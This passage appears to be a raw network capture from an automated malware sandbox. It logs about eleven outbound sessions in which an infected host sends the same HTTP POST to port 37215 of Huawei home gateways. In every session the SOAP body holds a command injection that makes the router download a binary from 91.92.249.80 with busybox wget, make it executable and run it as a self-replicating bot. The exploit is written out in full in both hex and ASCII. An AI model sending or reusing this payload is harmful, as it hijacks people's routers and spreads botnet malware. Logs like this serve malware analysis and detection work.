                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          940192.168.2.2356794157.191.32.23337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267827988 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          941192.168.2.233296643.7.243.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267920017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          942192.168.2.2359146157.123.53.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267930031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          943192.168.2.2340036197.147.92.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267937899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          944192.168.2.2333508157.149.147.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268547058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          945192.168.2.2338024157.251.203.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268553972 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          946192.168.2.2347924157.64.38.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268574953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          947192.168.2.234827299.72.77.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268575907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          948192.168.2.234835853.197.230.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268596888 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          949192.168.2.2349006157.24.30.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268627882 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          950192.168.2.2341196164.50.24.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268636942 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
